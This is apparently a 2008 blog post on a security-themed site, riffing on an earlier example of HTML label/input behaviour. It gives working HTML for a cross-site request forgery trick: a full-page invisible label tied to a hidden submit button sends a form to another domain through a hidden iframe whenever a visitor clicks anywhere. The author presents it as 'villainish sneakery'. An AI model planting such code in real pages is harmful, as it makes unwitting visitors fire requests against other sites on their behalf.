I found this post very interesting for a number of reasons. Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening. After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example. Plenty of nastniess can ensue.
<iframe name="my_frame" src="" style="display:none"></iframe> <form action="http://targetdomain.com" target="my_frame"> <p> <label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0"> </label> <input type="submit" id="submit" style="display:none"/> </p> </form>
- Posted by: atom, 2008 09.02
- trackback link
- Tags: CSRF, evil, hackeries, HTML, input, label, sneaky
- 1 response »